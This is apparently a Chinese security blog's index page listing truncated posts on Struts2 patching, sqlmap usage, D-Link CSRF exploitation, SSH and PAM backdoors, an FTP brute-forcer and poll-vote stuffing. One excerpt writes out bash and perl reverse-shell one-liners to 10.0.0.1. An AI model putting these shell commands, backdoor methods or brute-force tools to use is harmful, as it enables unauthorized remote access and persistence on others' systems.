201403-06 struts2命令执行漏洞修复 最近朋友的站被人入侵,检测发现是struts2的命令执行漏洞,低于2.3.15的版本是受影响的,想升级struts2,无奈发现还有用其它框架,升级过后各种报错,最后找到一个临时的解决方案,貌似某阿里大婶写的解决方案,记录一下,方便后来的童鞋学习。 1,将解压的三个目录拷贝到\ROOT\WEB-INF\classes目录下。一般情况都是这个目录; 2,配置\ROOT\WEB-INF\we.... Read More >
201402-26 那些年wooyun忽略的漏洞们 新手学python系列之那些年wooyun忽略的漏洞们...... 程序执行完会整理出wooyun漏洞列表中所有被忽略的漏洞url,无奈正则太菜,没整理出漏洞标题,只列出了url。 程序还有点bug,会打印2次url,不知道原因所在,也懒得解决了。其中bestcoding模块是在某群找到的万能编码的小程序,能省很多力气,本小程序中可以忽略不用。先贴上程序代码: #coding:utf.... Read More >
201402-15 sqlmap使用帮助文档(二) 注入 测试参数 参数:-p,--skip sqlmap默认测试所有的GET和POST参数,当--level的值大于等于2的时候也会测试HTTP Cookie头的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。但是你可以手动用-p参数设置想要测试的参数。例如: -p "id,user-anget" 当你使用--level的值很大但是有个.... Read More >
201402-15 sqlmap使用帮助文档(一) 当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行.... Read More >
201401-22 D-link路由器CSRF漏洞利用详解 1,介绍 本文的目的是展示CSRF漏洞的危害,以D-link的DIR-600路由器(硬件版本:BX,固件版本:2.16)的CSRF漏洞为例。 D-link的CSRF漏洞已经是公开的,本文将详细描述一下整个D-link CSRF漏洞的利用,如何通过CSRF漏洞实现远程管理访问D-link路由器。 2,CSRF漏洞说明 如果某些request请求中没有csrf token或不.... Read More >
201401-20 svn信息泄漏探测工具(新手学python) 快放假了,比较闲,写了个svn信息泄漏的探测工具,严格意义上说和wwwscan功能差不多,判断是否存在/.svn/等目录,贴上代码: #coding:utf-8 import sys import httplib2 if len(sys.argv)<2: print 'Usag:'+"svnscan.py"+" host.... Read More >
201401-10 Python实现Awvs自动化扫描 最近再做一个python的小程序,主要功能是实现Acuenetix Web Vulnerability Scanner的自动化扫描,批量对一些目标进行扫描,然后对扫描结果写入mysql数据库。写这篇文章,分享一下一些思路。 程序主要分三个功能模块,Url下载、批量扫描、结果入库, 有一个另外独立的程序,在流量镜像服务器上进行抓包,抓取Http协议的包,然后对包进行筛选处理,保留一些带有.... Read More >
201311-19 FTP帐号密码暴力破解小工具(新手学python) 群内一童鞋写的ftp暴力破解小工具,主要用到了FTP模块,功能很简单,不大实用,还有很多需要改进的地方,贴上代码: from ftplib import FTP import time def ConnectFtp(ftpAddress,user,password): for myaddress in ftpAddress: f=FTP(myaddress) .... Read More >
201311-19 vbs获取系统硬件信息小脚本 工作需要,需要获取win服务器的硬件信息,提交给一api 接口,最后用vbs实现了功能,主要是用到了WMI 发包是调用curl.exe来实现的,代码如下: REM '获取IP地址' REM '判断DNS是否为空,判断IP地址开头是否为10或192' strComputer = "." Set objWM.... Read More >
201311-07 python自动投票(新手学python) 前段时间看到黑马发起的2013年度创业家评选的网络投票活动,发现没有对单IP投票次数进行限制,可以无限次的投! 公司的大BOSS居然也在候选名单中,准备给大BOSS刷点票,写了个python自动投票脚本!主要用了httplib模块自动提交post请求. 贴上代码: #!/usr/bin/env python #coding=utf8 import httplib, urlli.... Read More >
201310-21 反弹shell的十种姿势 转载自 Wooyun Zone 作者:XSSER bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意这个是由解析shell的bash完成,所以某些情况下不支持 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socke.... Read More >
201309-17 IT人爱心项目三:募捐助学–结束 很早以前发起的爱心项目三:募捐助学,因为中间有学生的暑假,导致一直到最近才将募捐所得的资金邮寄给那边的老师。 在lsh4ck,疯子,西毒,sky的响应支持下,才让该项目能顺利进行,非常感谢几位! 加上我自己捐的,一共募捐了600元,下面是老师传过来的照片: 有时候能够排除各.... Read More >
201309-10 Linux系统安全之ssh后门 1.ssh -V #查看当前的ssh版本信息 #OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010 2.查找ssh的配置文件 一般都在/etc/ssh中 3.备份原来的文件的time 将/etc/ssh下的文件的备份 假设/etc/ssh/sshd_config 备份为/etc/ssh/sshd_config.old.... Read More >
201309-10 linux系统安全之pam后门 本文由Sky原创投稿,请尊重劳动成果,转载注明出处! 测试环境:Centos 6.2 64位 0x01:查询本机的PAM版本 下载地址: http://www.linux-pam.org/library/ https://fedorahosted.org/rel.... Read More >
201308-30 CoreText API Bug:可导致IOS6.1.3/OS X 10.8.4系统崩溃 今天是高富帅和白富美们不淡定的一天,IOS/Mac OS系统爆出了一个Bug,可以导致各种IM类型的APP崩溃。 该Bug是由于WebKit浏览器引擎导致的,受影响的系统有Mac OS 10.8和Ios 6,低于Ios 6和Ios 7、低于Mac OS10.8的版本不受该Bug影响。 任何使用了苹果的CoreText API渲染文本的浏览器或者应用程序都会受此Bug的影响,攻击字符串是.... Read More >
201308-16 Python实现自动登录网站 一段新手学习python的小程序,在圣哥指点下完成,主要功能是实现自动登录基调网络,并且完成打开WWW页面全屏显示的功能。 主要用到了Python Pamie模块,安装该模块需要先安装win32api模块,下面贴上具体的代码: ''' Created on 2013-8-15 @author: Nx4dm1n ''' #-.... Read More >